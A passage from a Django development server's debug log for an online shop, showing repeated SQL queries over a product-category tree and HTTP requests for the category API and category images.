= 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 12:46:15,853 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 12:46:15,855 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 12:46:15,857 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 12:46:15,860 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 12:46:15,863 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 12:46:15] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 12:46:16] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 12:46:16] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 12:46:16] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 200 784410 [19/Dec/2019 12:46:16] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [19/Dec/2019 12:46:16] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [19/Dec/2019 12:46:16] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 12:46:20] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [19/Dec/2019 12:46:20] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 12:46:22] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 12:46:23] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 200 309908 [19/Dec/2019 12:46:24] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 12:46:24] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 [19/Dec/2019 12:46:24] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 12:46:27] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [19/Dec/2019 12:46:31] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [19/Dec/2019 12:46:32] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [19/Dec/2019 12:46:33] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [19/Dec/2019 12:46:36] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 12:46:39] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [19/Dec/2019 12:46:39] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 200 379075 [19/Dec/2019 12:46:40] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 200 379075 [19/Dec/2019 12:46:40] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 200 379075 [19/Dec/2019 12:46:41] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 12:46:41] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 12:46:43] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 200 432480 [19/Dec/2019 12:46:44] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 200 432480 [19/Dec/2019 12:46:44] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 200 432480 [19/Dec/2019 12:46:47] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 200 432480 DEBUG 2019-12-19 12:46:48,068 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 12:46:48,076 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 12:46:48,079 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 12:46:48,082 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 12:46:48,085 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 12:46:48,088 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 12:46:48,090 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 12:46:48,092 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 12:46:48,094 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 12:46:48,098 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 12:46:48,100 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 12:46:48,102 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 12:46:48,104 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 12:46:48,107 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 12:46:48,110 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 12:46:48,113 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 12:46:48,116 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 12:46:48,118 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 12:46:48,121 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 12:46:48,124 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 12:46:48,127 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 12:46:48,129 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 12:46:48,131 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 12:46:48,134 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 12:46:48,139 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 12:46:48,143 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 12:46:48,146 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 12:46:48,149 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 12:46:48,152 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 12:46:48,156 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 12:46:48,160 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 12:46:48,163 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 12:46:48,166 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 12:46:48,168 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 12:46:48,171 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 12:46:48,175 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 12:46:48,178 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 12:46:48,181 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 12:46:48,184 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 12:46:48,187 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 12:46:48,190 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 12:46:48,194 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 12:46:48,196 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 12:46:48,199 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 12:46:48,202 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 12:46:48,205 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 12:46:48] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 12:46:49] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 12:46:50] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 200 376652 [19/Dec/2019 12:46:51] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 200 376652 [19/Dec/2019 12:46:52] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 200 376652 [19/Dec/2019 12:46:53] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 12:46:53] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 12:46:53] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 200 454674 [19/Dec/2019 12:46:54] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 200 454674 [19/Dec/2019 12:46:55] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 200 454674 [19/Dec/2019 12:46:57] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 200 454674 [19/Dec/2019 12:46:58] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 12:46:59] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [19/Dec/2019 12:47:00] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 200 523712 [19/Dec/2019 12:47:00] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 200 700594 [19/Dec/2019 12:47:03] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [19/Dec/2019 12:47:04] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [19/Dec/2019 12:47:05] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 [19/Dec/2019 12:47:05] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 12:47:06] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 12:48:54] "GET / HTTP/1.0" 302 0 [19/Dec/2019 12:53:57] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [19/Dec/2019 12:55:45] "GET /proxy.php HTTP/1.0" 404 6456 DEBUG 2019-12-19 12:57:19,100 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 12:57:19,111 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 12:57:19,117 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 12:57:19,121 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE 